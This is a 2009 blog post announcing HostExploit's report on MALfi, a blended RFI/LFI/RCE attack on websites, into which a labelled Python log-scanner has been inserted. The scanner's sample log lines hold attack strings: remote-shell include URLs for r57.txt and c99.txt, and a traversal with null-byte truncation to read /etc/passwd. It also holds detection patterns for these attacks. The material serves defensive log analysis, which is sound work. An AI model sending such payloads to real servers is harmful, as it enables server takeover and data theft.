Wednesday, 11 November 2009 07:58 in Blogs, Reports by Jart Armin
Cyber Crime International – MALfi
A new cybercrime report from HostExploit.com, producers of the definitive reports exposing RBN (Russian Business Network), Atrivo, McColo and Real Host, and a foremost source of rogue network activity analysis on the Internet.
Download the report here.
MALfi “A Silent Threat”
What is MALfi all about? It is a blended threat currently detected on around 350,000 websites and Internet servers. One major purpose is to establish "use once and throw away" disposable botnets for spam, phishing, DDoS and exploits.
Full Report (public version) download PDF – HostExploit Download page = http://bit.ly/eoO4C
Abstract / Press Release
MALfi is a descriptive umbrella term for the blended attack recently used by hackers and cyber criminals to compromise websites and servers. It is a combination of RFI (remote file inclusion), LFI (local file inclusion), XSA (cross server attack) and RCE (remote code execution).
Conservative estimates over recent months indicate around 350,000 affected websites and servers worldwide. HostExploit and associated researchers have tracked 103,351 attacks involving 2,743 unique IP addresses, with 85 countries and 911 ASNs involved in RFI scanning.
RFI is used by hackers to compromise websites by making the vulnerable server fetch and execute attacker-hosted code, typically a web shell (a remote user interface). This gives partial to full manual and unauthorized control over the server. It differs from the now familiar "drive-by" website exploit in that it provides hackers with a ready-made arena where Internet plunder, in the form of information, controlled servers and websites, is exchanged or resold to cyber criminal groups.
Essentially, the RFI hackers continuously and automatically scan websites for vulnerabilities to exploit. Once breached, the websites, and often the now compromised underlying servers, are used for DDoS (distributed denial of service) attacks such as the recent US and Korean government DDoS, spamming, phishing, large-scale ID theft and further attacks on other targets. It follows that many of the regular apparent attack attempts on high-volume governmental and other key servers were in fact RFI and similar vulnerability scanning by bots and scripts.
Compared with SQL injection, viruses and worms, RFI scanning and the exploitation that follows it happen continuously and affect all corners of the Internet. Both unpatched Windows systems and systems with RFI vulnerabilities have, in effect, a limited time to live before they are found and exploited.
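The RFI scanning described above leaves a recognisable trace in ordinary web server access logs, and the report's own headline numbers (attacks, unique attacking IPs) are just aggregations over such traces. The following Python script is an added example and is not code from the HostExploit report or the original post. It parses constructed Apache combined-format log lines (the addresses are RFC 5737 documentation ranges and the shell hosts, file names and paths are made up), flags parameter values that look like RFI payloads (an absolute URL to a remote file, typically a `.txt` holding a PHP shell with a trailing `?` so that any suffix the vulnerable include appends is discarded) and, going a little beyond the text, LFI attempts (directory traversal, null-byte truncation, PHP stream wrappers), then counts hits per source IP and per shell-hosting server. The heuristics and file-extension list are assumptions for illustration, not rules from the report.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (Apache "combined" format) for this example.
# Addresses are RFC 5737 documentation ranges; the hosts and shell files are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Nov/2009:07:58:01 +0000] "GET /index.php?page=http://198.51.100.9/r57.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.7 - - [11/Nov/2009:07:58:02 +0000] "GET /modules/mod_x/include.php?path=http://198.51.100.9/c99.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
198.51.100.44 - - [11/Nov/2009:08:01:13 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
192.0.2.10 - - [11/Nov/2009:08:02:30 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "http://example.org/" "Mozilla/5.0"
192.0.2.11 - - [11/Nov/2009:08:03:00 +0000] "GET /search.php?q=http://example.org/page HTTP/1.1" 200 700 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

REMOTE_SCHEMES = ("http://", "https://", "ftp://")
LOCAL_WRAPPERS = ("php://", "file://", "data:", "expect://")  # assumed wrapper list


def fully_decode(value, rounds=3):
    """Percent-decode until stable so double-encoded payloads (%252e%252e) are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def looks_like_rfi(value):
    """Absolute URL to a remote file. The classic scanner payload is
    http://host/shell.txt? where the trailing '?' swallows any suffix
    (e.g. '.php') that the vulnerable include() appends."""
    v = value.strip().lower()
    if not v.startswith(REMOTE_SCHEMES):
        return False
    path = urlsplit(v.rstrip("?")).path
    return v.endswith("?") or path.endswith((".txt", ".php", ".gif", ".jpg"))


def looks_like_lfi(value):
    """Directory traversal, null-byte truncation, or a PHP stream wrapper."""
    v = value.strip()
    return ("../" in v or "..\\" in v or "\x00" in v
            or v.startswith(("/etc/", "/proc/"))
            or v.lower().startswith(LOCAL_WRAPPERS))


def classify_value(raw_value):
    """Return ('rfi' | 'lfi' | None, decoded value) for one query parameter value."""
    value = fully_decode(raw_value)
    if looks_like_rfi(value):
        return "rfi", value
    if looks_like_lfi(value):
        return "lfi", value
    return None, value


def scan_log(text):
    """One finding per suspicious query parameter in the log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        rec = m.groupdict()
        query = urlsplit(rec["target"]).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            kind, value = classify_value(raw)
            if kind:
                findings.append({"ip": rec["ip"], "kind": kind, "param": name,
                                 "value": value, "status": int(rec["status"]),
                                 "ua": rec["ua"]})
    return findings


def summarize(findings):
    """Counts in the shape the report uses: attacks, unique source IPs, shell hosts."""
    by_ip = defaultdict(Counter)
    for f in findings:
        by_ip[f["ip"]][f["kind"]] += 1
    shell_hosts = Counter(urlsplit(f["value"].rstrip("?")).netloc
                          for f in findings if f["kind"] == "rfi")
    return {
        "attacks": len(findings),
        "unique_ips": len(by_ip),
        "by_kind": dict(Counter(f["kind"] for f in findings)),
        "by_ip": {ip: dict(c) for ip, c in by_ip.items()},
        "shell_hosts": dict(shell_hosts),
    }


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:15} {f['kind']} {f['param']}={f['value']!r} ({f['status']})")
    print(summarize(scan_log(SAMPLE_LOG)))
```

Two points the sample is chosen to show: a 404 is still an attack (the scanner is probing for a vulnerable include path and the failed probe is the intelligence), and a plain URL in a search parameter is not flagged, because it is neither a bare-file fetch nor suffixed with the tell-tale `?`. The `shell_hosts` count is the pivot a practitioner would use next: the host serving `r57.txt`/`c99.txt` is itself usually a compromised server, which is the decentralised structure the report describes.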
The three distinct stages of this serious but silent threat to Internet security are:
First stage – Remote File Inclusion Attack: Hacked websites and servers are not infectious to the web visitor and therefore remain undetected by most AV vendors and by reputation services such as Google's Safe Browsing. This "crack in the door" provides for the second stage.
Second stage – Doing Damage: Here the compromised websites and servers have attacker tools uploaded to them. These consist of both purchased and custom-written tools for nefarious activities such as sending phishing emails, hosting phishing sites, sending spam, hosting malware, defacing, DDoS and much more. XSA (cross server attacks), LFI (local file inclusion) and RCE (remote code execution) further compromise the system or other remote systems.
Third stage – Detection Avoidance: Upon completion of the cybercriminal action or discovery of
their attack, the miscreant removes their tools or causes them to self destruct before moving on.
With full control of the system, covering their tracks is accomplished easily.
With this technique there is no master server and no simple way to track it. The compromised servers are controlled via various anonymous web proxies and compromised hosts, in a totally decentralized manner. IRC (Internet relay chat) is primarily used, in a cell-like communication structure, to co-ordinate efforts and to launch vulnerability scans.
Identification of specific botnets such as Storm or Cutwail has been used to gather valuable cyber criminal intelligence, but the decentralized nature of RFI-based attacks requires deeper investigation and wider application of fundamental COMINT (communications intelligence) techniques. Even after being discovered, hackers using the RFI technique still have the compromised websites to re-launch from, or even to re-use. The whole process then begins again with scanning for vulnerabilities with a new disposable, single-use botnet.
The how, what and where of this particular hacking technique and cybercrime business model
are provided together with detailed and graphic explanations in the HostExploit community
research report.
Report download: see the link above. For further information contact:
Jart Armin – jart (at) jartarmin.com,
Scott D Logan - scott (at) hostexploit.com,
General enquiries - admin (at) hostexploit.com
Release Date - Nov 11th 2009